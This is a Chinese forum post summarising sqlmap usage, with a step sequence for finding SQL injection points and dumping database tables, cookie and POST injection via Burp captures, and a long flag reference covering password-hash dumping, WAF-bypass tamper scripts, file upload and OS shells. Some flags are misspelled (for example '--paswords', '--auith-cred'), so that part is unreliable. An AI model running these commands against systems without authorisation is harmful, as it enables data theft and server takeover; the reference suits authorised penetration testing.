IT评测·应用市场-qidao123.com技术社区

标题: Sqlmap常用下令总结 [打印本页]

作者: 星球的眼睛    时间: 2024-7-29 13:48
标题: Sqlmap常用下令总结
sqlmap常用下令总结:

留意:下令为kali linux中运行的 (windows中用python sqlmap.py执行)

1#、注入六连:

1.   sqlmap -u  "http://www.xx.com?id=x"    【查询是否存在注入点
3.     --current-db    【获取当前的数据库名
5.     --columns  -T "table_name" -D "db_name"  【获取数据库表中的字段
6.     --dump -C "columns_name" -T "table_name" -D "db_name"  【获取字段的数据内容
2#、COOKIE注入: 

sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2  【cookie注入 后接cookie值
3.     --current-db    【获取当前的数据库名
5.     --columns  -T "table_name" -D "db_name"  【获取数据库表中的字段
6.     --dump -C "columns_name" -T "table_name" -D "db_name"  【获取字段的数据内容

3#、POST注入:

(1)目的地址http:// www.xxx.com /login.asp
(2)打开brup署理。
(3)点击表单提交
(4)burp获取拦截信息(post)
(5)右键保存文件(.txt)到指定目录下
(6)运行sqlmap并执行如下下令:
用例:sqlmap -r okay.txt  -p  username
// -r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post哀求中表单提交的用户名或密码等name参数)
(7)主动获取表单:--forms主动获取表单
例如:sqlmap -u www.xx.com/login.asp --forms
(8)指定参数搜索:--data
例如:sqlmap -u www.xx.com/login.asp --data "username=1"
4#、常用指令:

2.    --tables      【获取表名
4.     --current-db    【获取当前的数据库名
5.     --current-user  【检测当前用户
6.    --is-dba   【判定站点的当前用户是否为数据库管理员
7.    --batch      【默认确认,不询问你是否输入
8.    --search  【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)
9.    --threads 10  【线程,sqlmap线程最高设置为10
10.  --level 3        【sqlmap默认测试全部的GET和POST参数,当--level的值大于等于2的时间也会测试HTTP Cookie头
                                的值,当大于等于3的时间也会测试User-Agent和HTTP Referer头的值。最高为5
11.  --risk 3           【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
12.     -v   【详细的等级(0-6)
          0:只表现Python的回溯,错误和关键消息。
          1:表现信息和警告消息。
          2:表现调试消息。
          3:有效载荷注入。
          4:表现HTTP哀求。
          5:表现HTTP响应头。
          6:表现HTTP响应页面的内容
13.    --privileges  【查看权限
14.   --tamper xx.py,cc.py   【防火墙绕过,后接tamper库中的py文件
15.  --method "OST" --data "page=1&id=2"   【POST方式提交数据
16.  --threads number  【采用多线程 后接线程数
17.  --referer  ""  【利用referer欺骗
18.  --user-agent ""     【自定义user-agent
19.  --proxy “目的地址″   【利用署理注入
下令字符解释==

-h                                           表现根本帮助信息
-hh                                         表现高级帮助信息
--version                                表现版本号
-v                                           详细等级(0-6 默认 1)
0:只表现python错误以及紧张信息
1:表现信息以及警告
2:表现debug消息
3:表现注入payload
4:表现http哀求
5:表现http响应头·
6:表现http响应内容
Target:
-u                                          指定目的url
-d                                          直接毗连数据库
-l                                           从burp署理日志的解析目的
-r                                           从文件中加载http哀求
-g                                          从google dork的结果作为目的url
-c                                          从INI配置文件中加载选项
Request
-A                                         指定user-agent头
-H                                         额外的header
-method=                              指定HTTP方法(GET/POST)
--data=                                 通过POST提交数据
--param-del=                        指定参数分隔符
--cookie=                              指定cookie的值
--cookie-del=                        指定cookie分隔符
--drop-set-cookie                  扔掉response中的set-cookie头
--random-agent                    利用随机的user-agent头
--host=                                  设置host头
--referer=                              指定referer头
--headers=                            额外的headers
--auth-type=                          http认证类型(Basic,NTLM,Digest)
--auith-cred=                         http认证凭据(账号:密码)
--ignore-proxy                       忽略系统署理(常用于扫描本地文件)
--proxy=                                利用署理
--proxy-cred=                        署理认证证书(账号:密码)
--delay=                                 设置延迟时间(两个哀求之间)
--timeout=                              超时时来毗连前等候(默认 30)
--retries=                                毗连超时时重试次数(默认 3)
--randomize=                         随机更改指定的参数的值
--safe-url=                             在测试期间经常访问的URL
--safe-post=                           POST数据发送到安全的URL
--safe-freq=                           两次哀求之间穿插一个安全的URL
--skip-urlencode                    跳过payload数据的URL编码
--chunked                             利用HTTP分块传输加密POST哀求
--hpp                                    利用HTTP参数pollution方法(常用于绕过IPS/IDS检测)
--force-ssl                             逼迫利用SSL/HTTPS
--eval=value                         哀求之前提供Python代码(eg:"import hashlib;id2=hashlib.md5(id).hexdigest()")
Optimization
-o                                         打开全部优化开关
--predict-output                   猜测输出(与--threads不兼容)
--keep-alive                         建立长久的HTTP(S)毗连 (与--proxy不兼容)
--null-connection                 空毗连
--threads=value                  设置线程(默认 1)
Injection
-p                                       指定测试参数
--skip=                               跳过指定参数的测试
--skip-static                        跳过测试静态的参数
--dbms=                             指定具体DBMS
--os=                                  指定DBMS操作系统
--invalid-bignum                利用大数字使值无效
--invalid-logical                  利用逻辑符使值无效
--invalid-string                   利用字符串使值无效
--no-cast                             关闭payload铸造机制
--no-escape                       关闭字符转义机制(默认主动开启)
--prefix=                             加入payload前缀
--suffix=                              加入payload后缀
--tamper=                          指定利用的脚本
Detectiong
--level=                              指定测试的等级(1-5 默认为1)
--risk=                               指定测试的风险(0-3 默认为1)
--string=                            登录成功时,页面所含有的“关键字” 用于证明已经登录成功
--not-string=                      登录成功时,页面所含有的“关键字” 用于证明已经登录失败
--code=                             查询为真时,匹配的HTTP代码
--smart                              当有大量检测目的时,只选择基于错误的检测结果
--text-only                         仅基于文本内容比较网页
--titles                               仅基于标题比较网页
Techniques
--technique=                      指定sql注入技术(默认BEUSTQ)
--time-sec=                        基于时间注入检测相应的延迟时间(默认为5秒)
--union-clos=                     举行查询时,指定列的范围
--union-char=                    指定暴力破解列数的字符
Fingerprint
-f                                      查询目的DBMS版本指纹信息
Emuneration
-a                                    查询全部
-b                                    查询目的DBMS banner信息
--current-user                 查询目的DBMS当前用户
--current-db                    查询目的DBMS当前数据库
--is-dba                          查询目的DBMS当前用户是否为DBA
--users                            罗列目的DBMS全部的用户
--paswords                     罗列目的DBMS用户密码哈希值
--privileges                     罗列目的DBMS用户的权限
--roles                            罗列DBMS用户的脚色
--dbs                              罗列DBMS全部的数据库
--tables                          罗列DBMS数据库中全部的表
--columns                      罗列DBMS数据库表中全部的列
--count                         检索表的条目的数量
--dump                         存储DBMS数据库的表中的条目
--dump-all                     存储DBMS全部数据库表中的条目
--D db                          指定举行罗列的数据库名称
--T   table                     指定举行罗列的数据库表名称
--C   column                 指定举行罗列的数据库列名称
--exclude-sysdbs          罗列表时排除系统数据库
--sql-query                    指定查询的sql语句
--sql-shell                     提示输入一个交互式sql shell
Brute force
--common-tables                       暴力破解表
--common-colomns                    暴力破解列
File system access
--file-read                            从目的数据库管理文件系统读取文件
--file-write                           上传文件到目的数据库管理文件系统
--file-dest                             指定写入文件的绝对路径
--os-cmd=                           执行操作系统下令
--os-shell                            交互式的系统shell
--os-pwn                             获取一个OOB shell,Meterpreter或者VNC
--os-smbrelay                    一键 获取一个OOB shell,Meterpreter或者VNC
--os-bof                              储存过程缓冲区溢出利用
--os-esc                              数据库进程用户权限提升
--msf-path=                        Metasploit  Framework本地安装路径
General
-s                                     sqlite会话文件保存位置
-t                                      记录全部HTTP流量到指定文件中
--batch                             测试过程中, 执行全部默认配置
--charset=v                      逼迫用于数据检索的字符编码
--crawl=                           从目的URL开始爬取网站
--crawl-exclude=              禁止爬取某个页面(eg:logout)
--csv-del=                        指定CSV输出中利用的的字符
--dump-format=               储存数据的方式(CSV(default),HTML,SQLITE)
--flush-session                 革新当前目的的会话文件
--fresh-queries                 忽略会话文件中储存的查询结果,重新查询
--hex                                利用DBMS hex函数举行数据检索
--outpout-dir=                  自定义输出目录
--save=                            保存选项到INI配置文件中
--scope=                          利用正则表达式从提供的日志中guo'l
--alert                               再找到SQL注入时运行主机操作系统下令
--purge-output                  安全的从输出目录中删除全部内容
--sqlmap-shell                  提示输入交互式sqlmap  shell
--update                           更新sqlmap

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/) Powered by Discuz! X3.4